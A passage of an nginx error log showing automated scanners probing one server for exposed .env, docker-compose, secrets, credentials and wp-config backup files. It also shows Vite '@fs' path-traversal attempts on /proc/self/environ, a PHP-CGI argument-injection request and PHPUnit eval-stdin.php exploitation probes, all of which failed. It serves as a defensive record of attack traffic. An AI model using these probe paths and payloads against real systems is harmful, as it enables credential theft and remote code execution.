"91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291851 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291852 open() "/var/www/html/.env.dev" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.dev HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291853 open() "/var/www/html/.env.prod" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.prod HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291854 open() "/var/www/html/.env.test" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.test HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291855 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291856 open() "/var/www/html/.env.backup" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.backup HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:20 [error] 416#416: *291857 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 416#416: *291858 open() "/var/www/html/.env.old" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.old HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 417#417: *291859 open() "/var/www/html/.env.bak" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.bak HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 417#417: *291860 open() "/var/www/html/.env.tmp" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.tmp HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 417#417: *291861 open() "/var/www/html/.env.swp" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.swp HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 417#417: *291862 open() "/var/www/html/.env~" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env~ HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:21 [error] 417#417: *291863 open() "/var/www/html/env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 415#415: *293352 open() "/var/www/html/env.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /env.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 415#415: *293353 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 415#415: *293354 open() "/var/www/html/src/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /src/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 415#415: *293355 open() "/var/www/html/config/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293356 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293357 open() "/var/www/html/frontend/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /frontend/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293358 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293359 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293360 open() "/var/www/html/client/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /client/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293361 open() "/var/www/html/web/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /web/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293362 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293363 open() "/var/www/html/private/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /private/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293364 open() "/var/www/html/var/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /var/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293365 open() "/var/www/html/docker-compose.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:22 [error] 416#416: *293366 open() "/var/www/html/docker-compose.yaml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yaml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:23 [error] 416#416: *293367 open() "/var/www/html/docker-compose.override.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.override.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:23 [error] 416#416: *293368 open() "/var/www/html/docker-compose.dev.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.dev.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:23 [error] 416#416: *293369 open() "/var/www/html/docker-compose.prod.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.prod.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:23 [error] 414#414: *294857 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:24 [error] 417#417: *296345 open() "/var/www/html/settings.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /settings.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:24 [error] 417#417: *296346 open() "/var/www/html/secrets.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /secrets.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:24 [error] 417#417: *296347 open() "/var/www/html/credentials.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /credentials.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296348 open() "/var/www/html/settings.py" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /settings.py HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296349 open() "/var/www/html/config.py" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config.py HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296350 open() "/var/www/html/secrets.py" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /secrets.py HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296351 open() "/var/www/html/config/secrets.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/secrets.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296352 open() "/var/www/html/config/master.key" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/master.key HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296353 open() "/var/www/html/wp-config.php.bak" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.bak HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296354 open() "/var/www/html/wp-config.php.old" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.old HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296355 open() "/var/www/html/wp-config.php.save" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.save HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296356 open() "/var/www/html/wp-config.php.txt" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.txt HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296357 open() "/var/www/html/wp-config.php~" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php~ HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296358 open() "/var/www/html/config/app.php" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/app.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 414#414: *296359 open() "/var/www/html/application.properties" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /application.properties HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 415#415: *296360 open() "/var/www/html/application.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /application.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 415#415: *296361 open() "/var/www/html/application.yaml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /application.yaml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 415#415: *296362 open() "/var/www/html/application-dev.properties" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /application-dev.properties HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:25 [error] 415#415: *296363 open() "/var/www/html/application-prod.properties" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /application-prod.properties HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296364 open() "/var/www/html/appsettings.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /appsettings.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296365 open() "/var/www/html/appsettings.Development.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /appsettings.Development.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296366 open() "/var/www/html/appsettings.Production.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /appsettings.Production.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296367 open() "/var/www/html/config.yaml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config.yaml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296368 open() "/var/www/html/config.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296369 open() "/var/www/html/config.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296370 open() "/var/www/html/serverless.yml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /serverless.yml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296371 open() "/var/www/html/serverless.yaml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /serverless.yaml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296372 open() "/var/www/html/vercel.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /vercel.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296373 open() "/var/www/html/netlify.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /netlify.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296374 open() "/var/www/html/config/production.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/production.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 415#415: *296375 open() "/var/www/html/config/development.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/development.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 416#416: *296376 open() "/var/www/html/config/default.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/default.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 416#416: *296377 open() "/var/www/html/config/local.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /config/local.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:26 [error] 416#416: *296378 open() "/var/www/html/conf/settings.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /conf/settings.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296379 open() "/var/www/html/data/config.json" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /data/config.json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296380 open() "/var/www/html/actuator/env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /actuator/env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296381 open() "/var/www/html/actuator/configprops" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /actuator/configprops HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296382 open() "/var/www/html/debug/vars" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /debug/vars HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296383 open() "/var/www/html/admin/config" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296384 open() "/var/www/html/api/config" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /api/config HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296385 open() "/var/www/html/api/settings" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /api/settings HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296386 open() "/var/www/html/api/env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /api/env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296387 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296388 open() "/var/www/html/.env.sample" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.sample HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296389 open() "/var/www/html/.env.dist" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.dist HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296390 open() "/var/www/html/.env.template" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.env.template HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 416#416: *296391 open() "/var/www/html/backup/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /backup/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 417#417: *296392 open() "/var/www/html/backups/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /backups/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 417#417: *296393 open() "/var/www/html/old/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /old/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:27 [error] 417#417: *296394 open() "/var/www/html/temp/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /temp/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296395 open() "/var/www/html/tmp/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296396 open() "/var/www/html/.streamlit/secrets.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.streamlit/secrets.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296397 open() "/var/www/html/.streamlit/config.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.streamlit/config.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296398 open() "/var/www/html/app/.streamlit/secrets.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /app/.streamlit/secrets.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296399 open() "/var/www/html/home/appuser/.streamlit/secrets.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /home/appuser/.streamlit/secrets.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296400 open() "/var/www/html/root/.streamlit/secrets.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /root/.streamlit/secrets.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296401 open() "/var/www/html/src/.streamlit/secrets.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /src/.streamlit/secrets.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296402 open() "/var/www/html/.streamlit/credentials.toml" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /.streamlit/credentials.toml HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296403 open() "/var/www/html/@fs/app/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/app/.env?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296404 open() "/var/www/html/@fs/root/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/root/.env?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296405 open() "/var/www/html/@fs/proc/self/environ" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/proc/self/environ?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 417#417: *296406 open() "/var/www/html/@fs/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/.env?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:28 [error] 414#414: *296410 open() "/var/www/html/@fs/..%2f..%2f..%2f..%2f..%2froot/.env" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/..%252f..%252f..%252f..%252f..%252froot/.env?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:32:29 [error] 414#414: *296411 open() "/var/www/html/@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ" failed (2: No such file or directory), client: 204.76.203.125, server: localhost-nginx-proxy-manager, request: "GET /@fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw?? HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 23:50:17 [error] 414#414: *296430 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 00:23:53 [error] 415#415: *296461 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 00:24:14 [error] 415#415: *296462 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 00:30:47 [error] 415#415: *296472 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:09 [error] 415#415: *296502 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:10 [error] 415#415: *296502 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:10 [error] 415#415: *296502 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:10 [error] 415#415: *296502 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:11 [error] 415#415: *296502 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:11 [error] 415#415: *296502 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:11 [error] 415#415: *296502 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:11 [error] 415#415: *296502 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:11 [error] 415#415: *296502 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:12 [error] 415#415: *296502 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:12 [error] 415#415: *296502 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:12 [error] 415#415: *296502 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:12 [error] 415#415: *296502 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:13 [error] 415#415: *296502 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:13 [error] 415#415: *296502 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:13 [error] 415#415: *296502 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:13 [error] 415#415: *296502 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:14 [error] 415#415: *296502 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:14 [error] 415#415: *296502 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:14 [error] 415#415: *296502 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: 